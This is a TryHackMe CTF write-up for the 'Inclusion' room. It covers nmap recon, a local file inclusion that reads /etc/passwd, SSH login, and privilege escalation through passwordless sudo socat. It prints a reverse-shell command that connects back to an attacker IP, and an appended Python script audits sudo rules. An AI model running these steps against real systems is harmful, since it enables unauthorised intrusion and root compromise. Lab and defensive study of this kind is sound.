Written by Yusuf Can Çakır.
[EN] Inclusion WriteUp | TryHackMe
Hi guys! We’re going to solve the room named “Inclusion” together. Let’s start.
Room: https://tryhackme.com/room/inclusion
Task 2 Root It
Recon
Let’s launch an nmap scan after starting the machine.
sudo nmap -A 10.10.120.135
We see that 2 ports are open: port 22 runs the SSH service and port 80 runs an HTTP server. First, we’re going to look at the website, because SSH requires a username and password. When we opened the website, we found a blog. I read this information and LFI-attack caught my attention.
This article describes the LFI attack, and we can see an LFI opening in this website’s URL. Let’s try it.
By exploiting this vulnerability, I read the passwd file in the /etc directory. The passwd file contains information about system users, such as usernames. It also gave away one user’s information.
That user is falconefeast, which caught my attention. Let’s log in to the SSH service with this information.
ssh [email protected]
Exploitation
Let’s read the user flag.
cat user.txt
Privilege Escalation
We have to escalate privileges to get the root flag. First, let’s take a look at our privileges.
sudo -l
socat can be run with root privileges without a password. We can exploit this; I used this page as a source: https://gtfobins.github.io/gtfobins/socat/
First, before exploiting it, I start a listener with the command below.
socat file:`tty`,raw,echo=0 tcp-listen:3032
Then we run the magic command on the target machine:
sudo socat tcp-connect:10.8.52.178:3032 exec:/bin/sh,pty,stderr,setsid,sigint,sane
We get a reverse shell, voilà!
cat /root/root.txt
That’s it for this article. You can follow our blog for more articles.
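From the defender's side, the sudo rule found in the privilege-escalation step is something an audit of `sudo -l` output can flag before anyone uses it. The Python code below is an added example, not part of the original write-up; the sample output, the /usr/bin/socat path, the host name "host" and the SHELL_CAPABLE list are constructed assumptions.

```python
import re
from pathlib import PurePosixPath

# Assumption: a short illustrative list of binaries that can start other
# programs; socat is the one abused in this write-up.
SHELL_CAPABLE = {"socat", "bash", "sh", "vim", "find", "awk", "less", "python3"}

# One rule line of `sudo -l`, e.g. "    (root) NOPASSWD: /usr/bin/socat"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_l(output):
    """Return the rules in `sudo -l` output that hand the user a root shell."""
    findings = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header, Defaults entries, blank lines
        # "(user : group)" -> keep only the user part of the run-as spec
        runas_users = m.group("runas").split(":")[0].split(",")
        if not any(u.strip() in ("root", "ALL") for u in runas_users):
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        # Commands are comma-separated; "\," is an escaped comma in an argument
        for cmd in re.split(r"(?<!\\),\s*", m.group("cmds").strip()):
            if not cmd:
                continue
            binary = cmd.split()[0]
            name = PurePosixPath(binary).name
            if binary == "ALL":
                reason = "unrestricted command set"
            elif name in SHELL_CAPABLE:
                reason = name + " can execute arbitrary programs"
            else:
                continue
            findings.append({"command": cmd, "nopasswd": nopasswd, "reason": reason})
    return findings

# Constructed sample, not captured from the room
SAMPLE = """\
Matching Defaults entries for falconefeast on host:
    env_reset, mail_badpass

User falconefeast may run the following commands on host:
    (root) NOPASSWD: /usr/bin/socat
    (root) /usr/bin/systemctl status ssh
"""

if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE):
        print(finding)
```

Removing the NOPASSWD socat rule from sudoers closes the path used above.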